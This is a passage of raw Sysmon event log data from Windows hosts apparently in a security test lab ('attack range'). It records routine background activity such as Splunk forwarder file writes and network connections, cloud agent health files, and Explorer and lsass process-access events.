Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:42.773{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56323-false10.0.1.12-8089- 354300x8000000000000000193495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:42.643{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56322-false10.0.1.12-8000- 23542300x8000000000000000193497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:46.072{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=043A4485FF9610B2391ECB2F266C0380,SHA256=F30374AFBFDFFBF8B47A2496B09C4A87CB52A9F8C6A60A0D4ED9B347CA76C23D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:47.569{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=D4792CE63E0C2761C5B248C1B4365412,SHA256=D51980C675F7045C77E3BB9D0A8E351FD1B5DAF9A00A25E4066C24F87B135575,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:47.797{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56324-false10.0.1.12-8000- 354300x8000000000000000193500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:53.695{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56325-false10.0.1.12-8000- 10341000x8000000000000000193501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:58.987{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-00F4-629A-4B08-000000005F02}6088C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:59.003{2E1864BB-FA2C-6299-4D07-000000005F02}33763132C:\Windows\Explorer.EXE{2E1864BB-00F4-629A-4B08-000000005F02}6088C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dadff|C:\Windows\System32\SHELL32.dll+dbd25|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:59.003{2E1864BB-FA2C-6299-4D07-000000005F02}33763132C:\Windows\Explorer.EXE{2E1864BB-00F4-629A-4B08-000000005F02}6088C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dbc3e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:59.003{2E1864BB-FA2C-6299-4D07-000000005F02}33763132C:\Windows\Explorer.EXE{2E1864BB-00F4-629A-4B08-000000005F02}6088C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dbc07|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:58.987{2E1864BB-FA2C-6299-4D07-000000005F02}3376ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:58.987{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-00F4-629A-4B08-000000005F02}6088C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dadff|C:\Windows\System32\SHELL32.dll+dc3b0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:58.987{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-00F4-629A-4B08-000000005F02}6088C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+123a10|C:\Windows\System32\SHELL32.dll+dc36c|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:58.987{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-00F4-629A-4B08-000000005F02}6088C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dc340|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000193511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:58.827{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56326-false10.0.1.12-8000- 23542300x8000000000000000193510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:00.787{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=301FD5BC40850FCE61209261B9996D4F,SHA256=E1854E5AA4EC6CA77EE8A5ABED991DED8FDF6B19EF2D9278B4F76ED04AB39E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:00.705{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-224MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:01.720{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-225MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:01.349{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:01.349{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000193516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:00.960{2E1864BB-E13E-6299-0D00-000000005F02}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56327-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 354300x8000000000000000193515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:00.960{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56327-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 23542300x8000000000000000193518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:05.701{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=22757DE51C6F61B310A901FBE5418B71,SHA256=FD3E3208D76322FD2B4BE952B6A05A4F587A4294E40D84F0B7A008A85EDF0409,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:05.301{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E6A1270F87292DF3B28B54351E1C4EE,SHA256=DAC9A84C11B6AF4052F9D7DD2297BF3162D6293BCA9AA4776D674DA92AF80B4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:04.672{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56328-false10.0.1.12-8000- 23542300x8000000000000000193521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:07.932{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A8EFE6431A47130AE15404819B46435,SHA256=15BA6AE784D6F89EBDC1B2FB2A1D6A40B59EB81112778EDF8FDE3991629C0F45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:07.932{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AC72132872BB874A392F133F0B0E33,SHA256=E4258FD3AD087980D35CF1061CDC988B75B52E3A1896DCB3F0A4B6B637067989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:08.816{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B8DF3D3B1279F24468823CF18B5D200,SHA256=F73B277EA6898EC3A25CBDB1D2F9B19A1AB15C8E1D44D5A27E2E737E1527F0BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:09.065{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=549FAA99C2AD0217865B471CF75312EF,SHA256=0DE18CE655176D2A98B4A744D308A5A27846584E7D483D039429392DF7BF84E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043743Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:09.093{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7369BC9FD931EDB8B9C2C474AEFB8154,SHA256=CBE4415D38D7B13BCBE6243D549833D2F695305397322F9E90398B7539393BA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043744Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:10.187{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4CA0DFB994D206A4B6680D5C1B17E41,SHA256=3C2B10F186852A19540ED5F894039359DF9A35D7D800BBC17F85D57519965089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:10.200{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6035A7263F7F0856ADB917CDBDF22EE4,SHA256=9C2B9352F962806D8D5964E20365FBDDF75667CD87C6373C73CF620C37696831,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043746Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:09.815{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52310-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043745Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:11.281{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7113662F69BF06E18085E1FB0A16112A,SHA256=9EA8A060F8189A75891F1FE529E4271B4E17DA91B07395191C081E6694372CBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:11.331{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5E0800B5E169CCC91B91DB9D9857C75,SHA256=3511048D0DED83B1F4E0424E5637E1C2153151CFC708517E89D3C9E8C5BEC26A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043747Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:12.374{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92794DDC90399B39291C700BA58CA1DF,SHA256=BEAE4F52709982EF5CA7B639AF917F052083CEE4AA71906E24985D63A97CDBD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:12.384{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=885B5940505F01EB23AEF567C277624F,SHA256=4669753DEF25AE4E146C9A05D1F6640C6BC4B7E0F5FE425CDF10FA6BEB4463A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:09.855{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56329-false10.0.1.12-8000- 23542300x8000000000000000193528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:13.498{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D415B5AF12BDED79F4956E2A70C30E0,SHA256=8815F37D6FD90594A5627390769BF231961D5D05856E87B5F89617A99C2295F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043748Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:13.468{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC2CA0D35E75C09C10379A873D675EA,SHA256=C977D840D1BDE9043FBD71EA59B46C12367FF1AA12F21883707F4403E7C6954E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:14.529{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEA78982526D0D9F50F47EC13D85C3C5,SHA256=3480273B82BA2ACA6CAC7A8F6EA0D96E1330A1E6B7500272E8E772BB1E546BEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043749Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:14.562{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AB55DA043F77BD458E21CF832206DFD,SHA256=A79C5E6BDDC495834CDD533988F2DA7CDE3D5F69665516A77E1F4F2596C07B23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:15.562{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18B105990D3FFCE3F9452FF1EBFD624B,SHA256=3BA05E03E448F43B00C8B3582713627F3EF5C7171F42D9A4DD1F50E572597FCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043750Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:15.656{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CCD1385BA1EB5E1E37E59D1AF77C55F,SHA256=42DE07BC79DB523CF7BDCE9DF825E83AAE64DF5CE8FDFA66C1D235FD0829C6CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.682{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F696A772C6E6EE8A4963533A280775DB,SHA256=D70F8D3D76B4759707AFFEC7FF1529D6D9C99908F4B8FBF1476E94E11D1624B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.662{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1774-629A-713D-000000005F02}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 